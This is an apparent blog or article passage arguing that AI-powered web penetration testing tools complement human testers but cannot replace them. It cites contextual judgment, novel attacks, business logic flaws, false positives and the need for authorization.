AI excels in handling immense data volumes while recognizing patterns. However, it typically lacks the contextual understanding that human testers possess. Web applications function within specific business contexts, and vulnerabilities may manifest differently based on various factors such as industry, user behaviour, and regulatory requirements. Human testers can interpret these nuances and prioritize findings based on their potential impact on the organization’s objectives.

One of the fundamental challenges in cybersecurity is staying ahead of adversaries who continually innovate and devise new attack techniques. Although AI algorithms can detect known vulnerabilities efficiently, they may struggle to adapt to novel attack vectors or zero-day exploits. Human penetration testers bring creativity to the table, utilizing their experience and intuition to think like attackers and uncover unexpected vulnerabilities that automated tools might miss.

Certain categories of vulnerabilities, such as logical flaws or business logic errors, often require human intervention to identify accurately. These vulnerabilities may not be easily detectable through automated scanning alone, as they involve understanding the underlying logic of the application and its intended functionality. Human testers can replicate real-world scenarios and apply sophisticated techniques to uncover subtle security weaknesses that AI might overlook.

AI-powered tools for web penetration testing are prone to generating false positives (incorrectly identifying vulnerabilities that do not exist) and false negatives (overlooking actual vulnerabilities). Although advancements in machine learning have improved accuracy, eliminating both false positives and false negatives remains a significant challenge. Human testers play an essential role in validating automated findings, minimizing false alarms, and providing valuable insights into the context of each vulnerability.

The ethical and legal implications of automated penetration testing must be carefully considered. AI-powered tools may generate substantial volumes of traffic and potentially disrupt web applications, leading to unintended consequences or violations of terms of service. Furthermore, utilizing automated tools without proper authorization can result in legal repercussions. Human testers exercise judgment, ensuring that tests are conducted responsibly, with appropriate permissions and adherence to ethical guidelines.

While AI has revolutionized web penetration testing by automating routine tasks, detecting known vulnerabilities, and enhancing efficiency, it cannot replace the critical thinking, intuition, and creativity of human testers. The synergy between AI and human expertise is essential for conducting comprehensive and effective security assessments. By leveraging the strengths of both AI-powered tools and human testers, organizations can achieve a more robust and adaptive approach to web application security.

❌